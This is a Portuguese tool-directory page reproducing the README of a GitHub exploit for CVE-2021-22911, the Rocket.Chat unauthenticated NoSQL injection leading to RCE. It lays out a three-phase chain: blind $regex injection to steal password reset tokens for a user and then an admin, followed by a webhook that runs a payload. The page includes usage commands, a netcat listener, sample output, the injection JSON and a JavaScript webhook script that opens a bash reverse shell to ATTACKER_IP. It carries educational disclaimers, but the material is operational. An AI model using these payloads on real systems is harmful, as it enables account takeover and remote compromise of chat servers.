Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
rocketcat-cve-2021-22911-exploit — CVE-2021-22911 Rocket.Chat NoSQL Injection RCE Exploit - Para Fins Educacionais | Kitploit
Ferramentas/GitHubGitHub/roshanrajbanshi/rocketcat-cve-2021-22911-exploit
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubroshanrajbanshi/rocketcat-cve-2021-22911-exploit

rocketcat-cve-2021-22911-exploit

CVE-2021-22911 Rocket.Chat NoSQL Injection RCE Exploit - Para Fins Educacionais

Ver Repositório
5há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit do Rocket.Chat CVE-2021-22911

⚠️ AVISO - APENAS PARA USO EDUCACIONAL

Este exploit é apenas para testes de penetração autorizados e fins educacionais. O acesso não autorizado a sistemas de computador é ilegal. O autor não se responsabiliza por qualquer uso indevido.

📋 Visão Geral

CVE-2021-22911 é uma vulnerabilidade crítica de injeção NoSQL não autenticada no Rocket.Chat que leva à Execução Remota de Código (RCE).

  • Pontuação CVSS: 9.8 (Crítica)
  • Versões Afetadas: Rocket.Chat < 3.12.7
  • Vetor de Ataque: Rede / Não Autenticado
  • Impacto: Comprometimento total do sistema

🎯 Detalhes da Vulnerabilidade

Este exploit combina três ataques de injeção NoSQL:

Fase 1: Redefinição de Senha de Usuário com Baixos Privilégios

  • Envia solicitação de senha esquecida para um usuário com baixos privilégios
  • Usa injeção NoSQL cega com o operador $regex para extrair o token de redefinição de senha caractere por caractere
  • Redefine a senha para um valor conhecido
  • Fase 2: Redefinição de Senha do Administrador

    • Repete a Fase 1, mas visa a conta do administrador
    • Extrai o token de redefinição de senha do administrador via injeção NoSQL cega
    • Altera a senha do administrador

    Fase 3: Execução Remota de Código

    • Autentica como a conta de administrador comprometida
    • Cria uma integração de webhook com payload JavaScript
    • O payload usa child_process.exec() do Node.js para gerar um reverse shell
    • Aciona o webhook para executar o reverse shell

    🛠️ Pré-requisitos

    root@kitploit:~
    pip install requests
    

    🚀 Uso

    1. Inicie o Netcat Listener (Terminal 1)

    root@kitploit:~
    nc -lvnp 4444
    

    2. Execute o Exploit (Terminal 2)

    Entrada de IP manual:

    root@kitploit:~
    python3 rocket_chat_exploit.py \
      -u [email protected] \
      -a [email protected] \
      -t http://chat.rocket.thm \
      -i 10.9.0.1 \
      -p 4444
    

    Detectar automaticamente o IP tun0 (Recomendado):

    root@kitploit:~
    python3 rocket_chat_exploit.py \
      -u [email protected] \
      -a [email protected] \
      -t http://chat.rocket.thm \
      -i $(ip a show tun0 | grep "inet " | awk '{print $2}' | cut -d/ -f1) \
      -p 4444
    

    Argumentos:

    • -u: E-mail do usuário com baixos privilégios (deve existir)
    • -a: E-mail do administrador
    • -t: URL alvo (instância do Rocket.Chat)
    • -i: Seu IP de atacante (tun0)
    • -p: Porta do listener Netcat

    Exemplo de Saída

    root@kitploit:~
    ============================================================
      Rocket.Chat CVE-2021-22911 — RCE
      Target : http://chat.rocket.thm
      Shell  : 10.9.0.1:4444
    ============================================================
    
    [PHASE 1] Low-priv user → [email protected]
    [+] Password reset email sent → [email protected]
    [*] Extracting reset token via blind NoSQL injection...
        [43/43] aBcDeFgHiJkLmNoPqRsTuVwXyZ1234567890abcd
    [+] Token: aBcDeFgHiJkLmNoPqRsTuVwXyZ1234567890abcd
    [+] Password changed to: P@$$w0rd!1234
    
    [PHASE 2] Admin user → [email protected]
    [+] Password reset email sent → [email protected]
    [*] Extracting reset token via blind NoSQL injection...
        [43/43] XyZ9876543210aBcDeFgHiJkLmNoPqRsTuVwXyZ
    [+] Token: XyZ9876543210aBcDeFgHiJkLmNoPqRsTuVwXyZ
    [+] Password changed to: P@$$w0rd!1234
    
    [PHASE 3] RCE
    [!] Start your listener now:  nc -lvnp 4444
    [*] Press Enter when nc is ready...
    [+] Authenticated as [email protected]
        userid : userid123456789
        token  : token123456...
    [+] Webhook created
        http://chat.rocket.thm/hooks/hookid123/token456
    [*] Triggering reverse shell...
    [+] Trigger sent — check your nc listener
    

    🔍 Detalhes Técnicos

    Formato do Payload de Injeção NoSQL

    root@kitploit:~
    {
      "message": {
        "msg": "method",
        "method": "getPasswordPolicy",
        "params": [
          {
            "token": {
              "$regex": "^abc"
            }
          }
        ]
      }
    }
    

    Payload RCE (Script do Webhook)

    root@kitploit:~
    class Script {
      process_incoming_request({ request }) {
        const require = console.log.constructor('return process.mainModule.require')();
        const { exec } = require('child_process');
        exec('bash -c "bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1"');
      }
    }
    

    📚 Referências

    • Exploit Original: enox - Exploit-DB 50078, 50108
    • Análise da Vulnerabilidade: Blog da SonarSource
    • Detalhes do CVE: CVE-2021-22911

    📝 Créditos

    • enox - Desenvolvimento do exploit original
    • SonarSource - Pesquisa e análise da vulnerabilidade

    ⚖️ Aviso Legal

    Esta ferramenta é fornecida apenas para fins educacionais e testes de segurança autorizados. O acesso não autorizado a sistemas de computador é uma infração penal sob o Computer Fraud and Abuse Act (CFAA) e leis internacionais similares.


    Use com responsabilidade. Teste apenas sistemas que você possui ou para os quais tenha permissão explícita por escrito.

    Baixar ferramenta